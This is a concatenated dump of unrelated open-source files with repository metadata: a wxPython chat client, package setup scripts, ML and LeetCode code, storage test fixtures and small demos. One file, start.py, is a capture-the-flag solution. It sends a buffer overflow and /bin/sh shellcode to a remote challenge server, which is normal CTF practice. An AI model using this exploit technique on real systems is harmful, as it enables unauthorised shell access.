response=con.read_some()
if response!=b'Connect Success':
self.showDialog('Error','Connect Fail',(200,100))
return
con.write(('login '+str(self.userName.GetLineText(0))+'\n').encode('utf-8'))
response=con.read_some()
if response==b'UserName Empty':
self.showDialog('Error','UserName Empty!',(200,100))
elif response==b'UserName Empty':
self.showDialog('Error','UserName Exists!',(200,100))
else:
self.Close()
ChatFrame(None,2,title='Chat Client',size=(500,400))
except Exception as ex:
print(str(ex))
self.showDialog('Error','Connect Fail!',(95,20))
def showDialog(self,title,content,size):
#显示错误信息对话框
print('Error:'+content)
dialog=wx.Dialog(self,title=title,size=size)
dialog.Center()
wx.StaticText(dialog,label=content)
dialog.ShowModal()
class ChatFrame(wx.Frame):
"""
聊天窗口
"""
def __init__(self,parent,id,title,size):
#初始化,添加控件并绑定事件
wx.Frame.__init__(self,parent,id,title)
self.SetSize(size)
self.Center()
self.chatFrame=wx.TextCtrl(self,pos=(5,5),size=(490,310),style=wx.TE_MULTILINE|wx.TE_READONLY)
self.message = wx.TextCtrl(self, pos=(5, 320), size=(300, 25))
self.sendButton=wx.Button(self,label='Send',pos=(310,320),size=(58,25))
self.usersButton=wx.Button(self,label='Users',pos=(373,320),size=(58,25))
self.closeButton=wx.Button(self,label='Close',pos=(436,320),size=(58,25))
#发送按钮绑定发送消息的方法
self.sendButton.Bind(wx.EVT_BUTTON,self.send)
#Users按钮绑定获取在线用户数量的方法
self.usersButton.Bind(wx.EVT_BUTTON,self.lookUsers)
#关闭按钮绑定关闭方法
self.closeButton.Bind(wx.EVT_BUTTON,self.close)
thread.start_new_thread(self.receive,())
self.Show()
def send(self,event):
#发送消息
message=str(self.message.GetLineText(0)).strip()
if message!='':
con.write(('say '+message+'\n').encode('utf-8'))
self.message.Clear()
def lookUsers(self,event):
#查看当前在线用户
con.write(b'look\n')
def close(self,event):
#关闭窗口
con.write(b'logout\n')
con.close()
self.Close()
def receive(self):
#接收服务器的消息
while True:
sleep(0.6)
result=con.read_very_eager()
if result!='':
self.chatFrame.AppendText(result)
numChar='0123456789'
enChar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def getRandom(length=8):
"""
获取随机码
@param {int} length 默认为8
@return {str} 随机码
"""
if length<4:
return None
randomDigit=''
numCount=random.randint(1,length-1) #数字出现的数量
enNumber=length-numCount
for i in range(length):
#随机添加数字或字母
if bool(random.randint(0,1)):
randomDigit+=random.choice(numChar)
numCount-=1
else:
randomDigit+=random.choice(enChar)
enNumber-=1
return randomDigit
if __name__ == '__main__':
app=wx.App()
con=telnetlib.Telnet()
LoginFrame(None,-1,title='Login',size=(320,250))
app.MainLoop()
# with open('内蒙电信红包随机码.txt', 'w',encoding='utf-8') as f:
# accTup=({'sum':100,'number':30},{'sum':30,'number':150},{'sum':5,'number':2500})
# charList=[]
# for i in range(3000):
# while True:
# char=getRandom(8)
# if char in charList:
# continue
# else:
# charList.append(char)
# break;
# for item in accTup:
# charCurList=charList[0:item['number']]
# for char in charCurList:
# line=char+'\t'+str(item['sum'])+'\n'
# f.write(line)
# charList=charList[item['number']:]
# for char in charList:
# line=char+'\t'+'预留'+'\n'
# f.write(line)
| [
"[email protected]"
] | |
bbdb15968f9fecce8a2c0b71d9694e7fb7ea60dd | 34f1074602e711ad2311afb7e0bcd624013a954e | /setup.py | fbcce1aad21f5a3c534ac2be29a70dda74b943ca | [
"MIT",
"Apache-2.0"
] | permissive | tareqalam/websauna | e8363c7dfec7faf2a804d78bf095ed8c2fd74ca0 | d6326efe3a35cb7cc16234b1ea64198e027ff257 | refs/heads/master | 2020-12-26T04:55:45.090210 | 2016-04-01T17:10:55 | 2016-04-01T17:10:55 | 55,261,614 | 0 | 0 | null | 2016-04-01T20:51:47 | 2016-04-01T20:51:46 | null | UTF-8 | Python | false | false | 5,398 | py | import sys
from setuptools import setup, find_packages
from codecs import open
from os import path
assert sys.version_info >= (3,4), "Websauna needs Python 3.4 or newer, you have {}".format(sys.version_info)
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='websauna',
namespace_packages=["websauna"],
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.0',
description=long_description.split()[0],
long_description=long_description,
# The project's main homepage.
url='https://github.com/websauna/websauna',
# Author details
author='Mikko Ohtamaa',
author_email='[email protected]',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='sqlalchemy postgresql pyramid pytest',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['docs']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
# Pyramid dependencies
'pyramid>=1.6',
'waitress',
'websauna.viewconfig',
'pyramid_redis_sessions',
'pyramid-layout',
"deform>=2.0a2",
'pyramid_deform',
"pyramid_debugtoolbar",
"pyramid_jinja2",
"ipython[notebook]<4",
"pyramid_ipython",
"scandir", # os.scandir backport for py3.4
"python-slugify", # ASCII slug generation
# Time handling
"arrow",
"pytz",
# SQLAlchemy and database support
"psycopg2",
"sqlalchemy",
"alembic",
"colanderalchemy",
"pyramid_tm",
"jsonpointer",
"pgcli",
# User management
"horus",
"authomatic",
# Email
'pyramid-mailer',
'premailer',
# Tasks
'pyramid_celery',
# Python 3.4 typing
"backports.typing",
# Needed by python_notebook etc. who call pyramid.paster module
"pyramid_notebook>=0.1.6",
"PasteDeploy",
# Console logging
"rainbow_logging_handler"
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': ['check-manifest', 'Sphinx', 'setuptools_git', 'zest.releaser', 'sphinx-autodoc-typehints', 'pyramid_autodoc', "sphinx_rtd_theme", "sphinxcontrib-zopeext", "ruamel.yaml"],
'test': ['pytest>=2.8', 'coverage', 'webtest', 'pytest-splinter', 'pytest-timeout', 'pytest-cov', "codecov", "flaky"],
},
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'ws-sync-db=websauna.system.devop.scripts.syncdb:main',
'ws-db-shell=websauna.system.devop.scripts.dbshell:main',
'ws-shell=websauna.system.devop.scripts.shell:main',
'ws-tweens=websauna.system.devop.scripts.tweens:main',
'ws-alembic=websauna.system.devop.scripts.alembic:main',
'ws-dump-db=websauna.system.devop.scripts.dumpdb:main',
'ws-create-user=websauna.system.devop.scripts.createuser:main',
'ws-celery=websauna.system.devop.scripts.celery:main',
'ws-pserve=websauna.system.devop.scripts.pserve:main',
'ws-create-table=websauna.system.devop.scripts.createtable:main',
'ws-sanity-check=websauna.system.devop.scripts.sanitycheck:main',
'ws-collect-static=websauna.system.devop.scripts.collectstatic:main',
],
'paste.app_factory': [
'main=websauna.system:main',
# Scheduler auomated test suite entry point
'scheduler_test=websauna.tests.test_scheduler:main',
'tutorial_test=websauna.tests.tutorial:main',
],
'pyramid.scaffold': [
"websauna_app=websauna.scaffolds:App",
"websauna_addon=websauna.scaffolds:Addon",
]
},
)
| [
"[email protected]"
] | |
de5585cdb7d57b5786ca3a57f62a92394188651f | b085a8631b20f5548627409e7c6d42557f0d4b7d | /libs/layers/assign.py | d3eaa1fd01e1891ed4b5a79dc9f859686a1f9e98 | [
"Apache-2.0"
] | permissive | abdulmuneer/FastMaskRCNN | cd810057b4d62b035f12078e19fce46ea9d1e30e | 2bd65f0faf21e140040242d884f3e33a087e5b04 | refs/heads/master | 2021-01-20T03:41:51.455023 | 2017-04-26T10:06:41 | 2017-04-26T10:06:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | #!/usr/bin/env python
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import libs.boxes.cython_bbox as cython_bbox
import libs.configs.config_v1 as cfg
from libs.boxes.bbox_transform import bbox_transform, bbox_transform_inv, clip_boxes
from libs.boxes.anchor import anchors_plane
from libs.logs.log import LOG
# FLAGS = tf.app.flags.FLAGS
_DEBUG = False
def assign_boxes(gt_boxes, min_k=2, max_k=5):
"""assigning boxes to layers in a pyramid according to its area
Params
-----
gt_boxes: of shape (N, 5), each entry is [x1, y1, x2, y2, cls]
strides: the stride of each layer, like [4, 8, 16, 32]
Returns
-----
layer_ids: of shape (N,), each entry is a id indicating the assigned layer id
"""
k0 = 4
if gt_boxes.size > 0:
layer_ids = np.zeros((gt_boxes.shape[0], ), dtype=np.int32)
ws = gt_boxes[:, 2] - gt_boxes[:, 0]
hs = gt_boxes[:, 3] - gt_boxes[:, 1]
areas = ws * hs
k = np.floor(k0 + np.log2(np.sqrt(areas) / 224))
inds = np.where(k < min_k)[0]
k[inds] = min_k
inds = np.where(k > max_k)[0]
k[inds] = max_k
if _DEBUG:
print ("### boxes and layer ids")
print (np.hstack((gt_boxes[:, 0:4], k[:, np.newaxis])))
return k.astype(np.int32)
else:
return np.asarray([], dtype=np.int32)
| [
"[email protected]"
] | |
6b67fbc7d998de614a48c315933888a62a343846 | 6b033e3dddc280417bb97500f72e68d7378c69d6 | /V. Algorithm/ii. Site/F. LeetCode/0241_different_ways_to_add_parentheses.py | bd5f9b246157a8f093769f995d43c706ba430806 | [] | no_license | inyong37/Study | e5cb7c23f7b70fbd525066b6e53b92352a5f00bc | e36252a89b68a5b05289196c03e91291dc726bc1 | refs/heads/master | 2023-08-17T11:35:01.443213 | 2023-08-11T04:02:49 | 2023-08-11T04:02:49 | 128,149,085 | 11 | 0 | null | 2022-10-07T02:03:09 | 2018-04-05T02:17:17 | Jupyter Notebook | UTF-8 | Python | false | false | 714 | py | from typing import List
class Solution:
def diffWaysToCompute(self, expression: str) -> List[int]:
def compute(left, right, op):
results = []
for l in left:
for r in right:
results.append(eval(str(l) + op + str(r)))
return results
if expression.isdigit():
return [int(expression)]
results = []
for idx, val in enumerate(expression):
if val in "+-*":
left = self.diffWaysToCompute(expression[:idx])
right = self.diffWaysToCompute(expression[idx+1:])
results.extend(compute(left, right, val))
return results
| [
"[email protected]"
] | |
a370b77af6502fb608bde82df099f9416b01af0f | 06c0d8151983a7f16aa3d18b254b5f0ef012197e | /tests/conformance/conftest.py | e62b74e8bfadee13e226066ff225ddbf0bb12010 | [
"Apache-2.0"
] | permissive | googleapis/python-storage | 3a15ece3cecb95ee8b9fb0b193757961f6e0f027 | bdd7c6c19c96a4dbd2249ba39399f8f6ff799fe1 | refs/heads/main | 2023-09-03T13:02:17.527509 | 2023-08-31T20:09:41 | 2023-08-31T20:09:41 | 226,992,639 | 363 | 161 | Apache-2.0 | 2023-09-02T01:01:14 | 2019-12-10T00:10:14 | Python | UTF-8 | Python | false | false | 3,881 | py | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import random
import uuid
import pytest
from google.auth.credentials import AnonymousCredentials
from google.cloud import storage
from google.cloud.exceptions import NotFound
"""Environment variable or default host for Storage testbench emulator."""
_HOST = os.environ.get("STORAGE_EMULATOR_HOST", "http://localhost:9000")
"""Emulated project information for the storage testbench."""
_CONF_TEST_PROJECT_ID = "my-project-id"
_CONF_TEST_SERVICE_ACCOUNT_EMAIL = (
"[email protected]"
)
_CONF_TEST_PUBSUB_TOPIC_NAME = "my-topic-name"
"""Create content payload in different sizes."""
def _create_block(desired_kib):
line = "abcdefXYZ123456789ADDINGrandom#" # len(line) = 31
multiplier = int(desired_kib / (len(line) + 1))
lines = "".join(
line + str(random.randint(0, 9)) for _ in range(multiplier)
) # add random single digit integers
return 1024 * lines
_STRING_CONTENT = "hello world"
_SIZE_9MB = 9216 # 9*1024 KiB
########################################################################################################################################
### Pytest Fixtures to Populate Retry Conformance Test Resources #######################################################################
########################################################################################################################################
@pytest.fixture
def client():
client = storage.Client(
project=_CONF_TEST_PROJECT_ID,
credentials=AnonymousCredentials(),
client_options={"api_endpoint": _HOST},
)
return client
@pytest.fixture
def bucket(client):
bucket = client.bucket(uuid.uuid4().hex)
client.create_bucket(bucket)
yield bucket
try:
bucket.delete(force=True)
except NotFound: # in cases where bucket is deleted within the test
pass
@pytest.fixture
def object(client, bucket):
blob = client.bucket(bucket.name).blob(uuid.uuid4().hex)
blob.upload_from_string(_STRING_CONTENT)
blob.reload()
yield blob
try:
blob.delete()
except NotFound: # in cases where object is deleted within the test
pass
@pytest.fixture
def notification(client, bucket):
notification = client.bucket(bucket.name).notification(
topic_name=_CONF_TEST_PUBSUB_TOPIC_NAME
)
notification.create()
notification.reload()
yield notification
try:
notification.delete()
except NotFound: # in cases where notification is deleted within the test
pass
@pytest.fixture
def hmac_key(client):
hmac_key, _secret = client.create_hmac_key(
service_account_email=_CONF_TEST_SERVICE_ACCOUNT_EMAIL,
project_id=_CONF_TEST_PROJECT_ID,
)
yield hmac_key
try:
hmac_key.state = "INACTIVE"
hmac_key.update()
hmac_key.delete()
except NotFound: # in cases where hmac_key is deleted within the test
pass
@pytest.fixture
def file_data(client, bucket):
blob = client.bucket(bucket.name).blob(uuid.uuid4().hex)
payload = _create_block(_SIZE_9MB)
blob.upload_from_string(payload)
yield blob, payload
try:
blob.delete()
except NotFound: # in cases where object is deleted within the test
pass
| [
"[email protected]"
] | |
37b862cdca4f6aaadc98f6f52088f748238199fc | d4f2e2e3552ab4b111f78cfbad0d30c144201093 | /2017-06-12/fib_pool.py | f13094e9069f611b6d36535aced6b7f77612ccaa | [
"Apache-2.0"
] | permissive | dongweiming/mp | c1e9f6f2c1fd8adbd4d7b8ffc45c5cc288cdcd80 | 129c31c818e1f0c39c983aad1f2f1ad9fa7efb1c | refs/heads/master | 2023-04-29T07:56:27.198574 | 2022-10-30T04:20:09 | 2022-10-30T04:21:27 | 75,051,758 | 96 | 35 | Apache-2.0 | 2023-04-17T17:34:17 | 2016-11-29T06:44:53 | Python | UTF-8 | Python | false | false | 358 | py | # coding=utf-8
import time
from multiprocessing.pool import Pool
NUMBERS = range(25, 38)
def fib(n):
if n<= 2:
return 1
return fib(n-1) + fib(n-2)
start = time.time()
pool = Pool(3)
for num, result in zip(NUMBERS, pool.map(fib, NUMBERS)):
print('fib({}) = {}'.format(num, result))
print('COST: {}'.format(time.time() - start))
| [
"[email protected]"
] | |
c5b1f4a73c9c08155e9a6d60d56eb20d4a326fe6 | b08870f8fe7b3cf1bbab3c52a7bacbb36ee1dcc6 | /verp/regional/italy/setup.py | 3d54c566d12ddaeac03248cdc8b198f91b7354b0 | [] | no_license | vsadminpk18/verpfinalversion | 7148a64fe6134e2a6371470aceb1b57cc4b5a559 | 93d164b370ad9ca0dd5cda0053082dc3abbd20da | refs/heads/master | 2023-07-13T04:11:59.211046 | 2021-08-27T06:26:48 | 2021-08-27T06:26:48 | 400,410,611 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,292 | py | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# coding=utf-8
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.custom.doctype.custom_field.custom_field import create_custom_fields
from frappe.permissions import add_permission, update_permission_property
from verp.regional.italy import fiscal_regimes, tax_exemption_reasons, mode_of_payment_codes, vat_collectability_options
def setup(company=None, patch=True):
make_custom_fields()
setup_report()
add_permissions()
def make_custom_fields(update=True):
invoice_item_fields = [
dict(fieldname='tax_rate', label='Tax Rate',
fieldtype='Float', insert_after='description',
print_hide=1, hidden=1, read_only=1),
dict(fieldname='tax_amount', label='Tax Amount',
fieldtype='Currency', insert_after='tax_rate',
print_hide=1, hidden=1, read_only=1, options="currency"),
dict(fieldname='total_amount', label='Total Amount',
fieldtype='Currency', insert_after='tax_amount',
print_hide=1, hidden=1, read_only=1, options="currency")
]
customer_po_fields = [
dict(fieldname='customer_po_details', label='Customer PO',
fieldtype='Section Break', insert_after='image'),
dict(fieldname='customer_po_no', label='Customer PO No',
fieldtype='Data', insert_after='customer_po_details',
fetch_from = 'sales_order.po_no',
print_hide=1, allow_on_submit=1, fetch_if_empty= 1, read_only=1, no_copy=1),
dict(fieldname='customer_po_clm_brk', label='',
fieldtype='Column Break', insert_after='customer_po_no',
print_hide=1, read_only=1),
dict(fieldname='customer_po_date', label='Customer PO Date',
fieldtype='Date', insert_after='customer_po_clm_brk',
fetch_from = 'sales_order.po_date',
print_hide=1, allow_on_submit=1, fetch_if_empty= 1, read_only=1, no_copy=1)
]
custom_fields = {
'Company': [
dict(fieldname='sb_e_invoicing', label='E-Invoicing',
fieldtype='Section Break', insert_after='date_of_establishment', print_hide=1),
dict(fieldname='fiscal_regime', label='Fiscal Regime',
fieldtype='Select', insert_after='sb_e_invoicing', print_hide=1,
options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), fiscal_regimes))),
dict(fieldname='fiscal_code', label='Fiscal Code', fieldtype='Data', insert_after='fiscal_regime', print_hide=1,
description=_("Applicable if the company is an Individual or a Proprietorship")),
dict(fieldname='vat_collectability', label='VAT Collectability',
fieldtype='Select', insert_after='fiscal_code', print_hide=1,
options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), vat_collectability_options))),
dict(fieldname='cb_e_invoicing1', fieldtype='Column Break', insert_after='vat_collectability', print_hide=1),
dict(fieldname='registrar_office_province', label='Province of the Registrar Office',
fieldtype='Data', insert_after='cb_e_invoicing1', print_hide=1, length=2),
dict(fieldname='registration_number', label='Registration Number',
fieldtype='Data', insert_after='registrar_office_province', print_hide=1, length=20),
dict(fieldname='share_capital_amount', label='Share Capital',
fieldtype='Currency', insert_after='registration_number', print_hide=1,
description=_('Applicable if the company is SpA, SApA or SRL')),
dict(fieldname='no_of_members', label='No of Members',
fieldtype='Select', insert_after='share_capital_amount', print_hide=1,
options="\nSU-Socio Unico\nSM-Piu Soci", description=_("Applicable if the company is a limited liability company")),
dict(fieldname='liquidation_state', label='Liquidation State',
fieldtype='Select', insert_after='no_of_members', print_hide=1,
options="\nLS-In Liquidazione\nLN-Non in Liquidazione")
],
'Sales Taxes and Charges': [
dict(fieldname='tax_exemption_reason', label='Tax Exemption Reason',
fieldtype='Select', insert_after='included_in_print_rate', print_hide=1,
depends_on='eval:doc.charge_type!="Actual" && doc.rate==0.0',
options="\n" + "\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), tax_exemption_reasons))),
dict(fieldname='tax_exemption_law', label='Tax Exempt Under',
fieldtype='Text', insert_after='tax_exemption_reason', print_hide=1,
depends_on='eval:doc.charge_type!="Actual" && doc.rate==0.0')
],
'Customer': [
dict(fieldname='fiscal_code', label='Fiscal Code', fieldtype='Data', insert_after='tax_id', print_hide=1),
dict(fieldname='recipient_code', label='Recipient Code',
fieldtype='Data', insert_after='fiscal_code', print_hide=1, default="0000000"),
dict(fieldname='pec', label='Recipient PEC',
fieldtype='Data', insert_after='fiscal_code', print_hide=1),
dict(fieldname='is_public_administration', label='Is Public Administration',
fieldtype='Check', insert_after='is_internal_customer', print_hide=1,
description=_("Set this if the customer is a Public Administration company."),
depends_on='eval:doc.customer_type=="Company"'),
dict(fieldname='first_name', label='First Name', fieldtype='Data',
insert_after='salutation', print_hide=1, depends_on='eval:doc.customer_type!="Company"'),
dict(fieldname='last_name', label='Last Name', fieldtype='Data',
insert_after='first_name', print_hide=1, depends_on='eval:doc.customer_type!="Company"')
],
'Mode of Payment': [
dict(fieldname='mode_of_payment_code', label='Code',
fieldtype='Select', insert_after='included_in_print_rate', print_hide=1,
options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), mode_of_payment_codes)))
],
'Payment Schedule': [
dict(fieldname='mode_of_payment_code', label='Code',
fieldtype='Select', insert_after='mode_of_payment', print_hide=1,
options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), mode_of_payment_codes)),
fetch_from="mode_of_payment.mode_of_payment_code", read_only=1),
dict(fieldname='bank_account', label='Bank Account',
fieldtype='Link', insert_after='mode_of_payment_code', print_hide=1,
options="Bank Account"),
dict(fieldname='bank_account_name', label='Bank Name',
fieldtype='Data', insert_after='bank_account', print_hide=1,
fetch_from="bank_account.bank", read_only=1),
dict(fieldname='bank_account_no', label='Bank Account No',
fieldtype='Data', insert_after='bank_account_name', print_hide=1,
fetch_from="bank_account.bank_account_no", read_only=1),
dict(fieldname='bank_account_iban', label='IBAN',
fieldtype='Data', insert_after='bank_account_name', print_hide=1,
fetch_from="bank_account.iban", read_only=1),
dict(fieldname='bank_account_swift_number', label='Swift Code (BIC)',
fieldtype='Data', insert_after='bank_account_iban', print_hide=1,
fetch_from="bank_account.swift_number", read_only=1),
],
"Sales Invoice": [
dict(fieldname='vat_collectability', label='VAT Collectability',
fieldtype='Select', insert_after='taxes_and_charges', print_hide=1,
options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), vat_collectability_options)),
fetch_from="company.vat_collectability"),
dict(fieldname='sb_e_invoicing_reference', label='E-Invoicing',
fieldtype='Section Break', insert_after='against_income_account', print_hide=1),
dict(fieldname='company_fiscal_code', label='Company Fiscal Code',
fieldtype='Data', insert_after='sb_e_invoicing_reference', print_hide=1, read_only=1,
fetch_from="company.fiscal_code"),
dict(fieldname='company_fiscal_regime', label='Company Fiscal Regime',
fieldtype='Data', insert_after='company_fiscal_code', print_hide=1, read_only=1,
fetch_from="company.fiscal_regime"),
dict(fieldname='cb_e_invoicing_reference', fieldtype='Column Break',
insert_after='company_fiscal_regime', print_hide=1),
dict(fieldname='customer_fiscal_code', label='Customer Fiscal Code',
fieldtype='Data', insert_after='cb_e_invoicing_reference', read_only=1,
fetch_from="customer.fiscal_code"),
dict(fieldname='type_of_document', label='Type of Document',
fieldtype='Select', insert_after='customer_fiscal_code',
options='\nTD01\nTD02\nTD03\nTD04\nTD05\nTD06\nTD16\nTD17\nTD18\nTD19\nTD20\nTD21\nTD22\nTD23\nTD24\nTD25\nTD26\nTD27'),
],
'Purchase Invoice Item': invoice_item_fields,
'Sales Order Item': invoice_item_fields,
'Delivery Note Item': invoice_item_fields,
'Sales Invoice Item': invoice_item_fields + customer_po_fields,
'Quotation Item': invoice_item_fields,
'Purchase Order Item': invoice_item_fields,
'Purchase Receipt Item': invoice_item_fields,
'Supplier Quotation Item': invoice_item_fields,
'Address': [
dict(fieldname='country_code', label='Country Code',
fieldtype='Data', insert_after='country', print_hide=1, read_only=0,
fetch_from="country.code"),
dict(fieldname='state_code', label='State Code',
fieldtype='Data', insert_after='state', print_hide=1)
],
'Purchase Invoice': [
dict(fieldname='document_type', label='Document Type',
fieldtype='Data', insert_after='company', print_hide=1, read_only=1
),
dict(fieldname='destination_code', label='Destination Code',
fieldtype='Data', insert_after='company', print_hide=1, read_only=1
),
dict(fieldname='imported_grand_total', label='Imported Grand Total',
fieldtype='Data', insert_after='update_auto_repeat_reference', print_hide=1, read_only=1
)
],
'Purchase Taxes and Charges': [
dict(fieldname='tax_rate', label='Tax Rate',
fieldtype='Data', insert_after='parenttype', print_hide=1, read_only=0
)
],
'Supplier': [
dict(fieldname='fiscal_code', label='Fiscal Code',
fieldtype='Data', insert_after='tax_id', print_hide=1, read_only=1
),
dict(fieldname='fiscal_regime', label='Fiscal Regime',
fieldtype='Select', insert_after='fiscal_code', print_hide=1, read_only=1,
options= "\nRF01\nRF02\nRF04\nRF05\nRF06\nRF07\nRF08\nRF09\nRF10\nRF11\nRF12\nRF13\nRF14\nRF15\nRF16\nRF17\nRF18\nRF19"
)
]
}
create_custom_fields(custom_fields, ignore_validate = frappe.flags.in_patch, update=update)
def setup_report():
report_name = 'Electronic Invoice Register'
frappe.db.set_value("Report", report_name, "disabled", 0)
if not frappe.db.get_value('Custom Role', dict(report=report_name)):
frappe.get_doc(dict(
doctype='Custom Role',
report=report_name,
roles= [
dict(role='Accounts User'),
dict(role='Accounts Manager')
]
)).insert()
def add_permissions():
doctype = 'Import Supplier Invoice'
add_permission(doctype, 'All', 0)
for role in ('Accounts Manager', 'Accounts User','Purchase User', 'Auditor'):
add_permission(doctype, role, 0)
update_permission_property(doctype, role, 0, 'print', 1)
update_permission_property(doctype, role, 0, 'report', 1)
if role in ('Accounts Manager', 'Accounts User'):
update_permission_property(doctype, role, 0, 'write', 1)
update_permission_property(doctype, role, 0, 'create', 1)
update_permission_property(doctype, 'Accounts Manager', 0, 'delete', 1)
add_permission(doctype, 'Accounts Manager', 1)
update_permission_property(doctype, 'Accounts Manager', 1, 'write', 1)
update_permission_property(doctype, 'Accounts Manager', 1, 'create', 1)
| [
"[email protected]"
] | |
f92bdc62fa76b59090edc88420ad797e65e5b5b8 | e17483ba000de9c6135e26ae6c09d9aa33004574 | /ipynbs/流程控制/src/lock.py | 527e33d048a10128a19edbe32bb8ce76108c1492 | [
"Apache-2.0"
] | permissive | HAOzj/TutorialForPython | 27ae50c6b9fb3289ae7f67b8106d3d4996d145a7 | df7a6db94b77f4861b11966399f5359d00911a16 | refs/heads/master | 2020-03-17T09:19:45.199165 | 2018-04-02T13:33:27 | 2018-04-02T13:33:27 | 133,470,105 | 1 | 0 | null | 2018-05-15T06:35:01 | 2018-05-15T06:35:01 | null | UTF-8 | Python | false | false | 360 | py | import multiprocessing
import sys
def worker_with(lock, f):
with lock:
with open(f,"a+") as fs:
fs.write('Lock acquired via with\n')
if __name__ == '__main__':
f = "source/file.txt"
lock = multiprocessing.Lock()
w = multiprocessing.Process(target=worker_with, args=(lock, f))
w.start()
w.join() | [
"[email protected]"
] | |
ef81636e011ddbfe54443ed35eb0808243aee7ec | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /pwnable_start/start.py | a51348673cc5407c52bddaa973546e1794ed2e67 | [] | no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | from pwn import *
context.log_level = "debug"
#p = process('./start')
p = remote('node4.buuoj.cn', 28412)
call_write = 0x8048087
payload = b'a' * 0x14 + p32(call_write)
p.sendafter(b"Let's start the CTF:", payload)
esp = u32(p.recv(4))
print('esp -> {}'.format(hex(esp)))
shellcode='''
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
xor edx,edx
mov ebx,esp
mov al,0xb
int 0x80
'''
payload = b'a' * 0x14 + p32(esp + 0x14) + asm(shellcode)
p.send(payload)
p.interactive()
| [
"[email protected]"
] | |
1ce15ec0a75c7d5b1b1db406679c60d7f009833e | 6c53847f9956edc8f31b23c24b1786d1b9789f03 | /tacker/venv/bin/wheel | 86288a383455d2b1f18e3d5a11af91fdaf3673c4 | [] | no_license | kunal1510010/Quikmile | c64a9264798cf834aaf32ecb4653b9b81dab0dd5 | 244d2749eb8438ce858de51c088a52ca3de58992 | refs/heads/master | 2022-12-12T08:03:50.628252 | 2018-11-29T15:24:46 | 2018-11-29T15:24:46 | 159,226,383 | 0 | 0 | null | 2022-12-08T02:27:44 | 2018-11-26T20:10:20 | Python | UTF-8 | Python | false | false | 235 | #!/home/kunal/Desktop/cas/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
e8a969c5226b7404f99680e5874e25631fa54af4 | 964b063c2461aad267ddd991fefaf7ab53b1ca94 | /8-kyu/plural/python/solution.py | 299175ea2855b95721abb6031ba1809c291de123 | [] | no_license | lucasbflopes/codewars-solutions | 26c4e2cd1be19db50cc8c1d9fc117c51c82a2259 | 72ef2c02dde7bd0d5a691e04e3b2a383e892f84b | refs/heads/master | 2022-03-14T01:26:41.816498 | 2019-11-23T17:17:19 | 2019-11-23T17:17:19 | 114,834,447 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | def plural(n):
return not n == 1 | [
"[email protected]"
] | |
fe351d2472b7dbfcf0af804a27e8f390c8ff6337 | 4ddf82eeb31d46fb67802a4375390eb42a8f23b8 | /tests/misc/sys_settrace_subdir/trace_generic.py | 111a9d19ff30dda48e0212bcf758d99032cd8a9c | [
"MIT"
] | permissive | pulkin/micropython | 1437a507b9e90c8824e80c3553e6209d89e64565 | c274c947c611f510fd2b1c4ef6cbd9f4283794fc | refs/heads/master | 2023-03-08T02:35:28.208819 | 2022-04-19T12:38:47 | 2022-04-19T12:38:47 | 167,732,676 | 103 | 36 | MIT | 2023-02-25T03:02:36 | 2019-01-26T19:57:59 | C | UTF-8 | Python | false | false | 1,540 | py | print("Now comes the language constructions tests.")
# function
def test_func():
def test_sub_func():
print("test_function")
test_sub_func()
# closure
def test_closure(msg):
def make_closure():
print(msg)
return make_closure
# exception
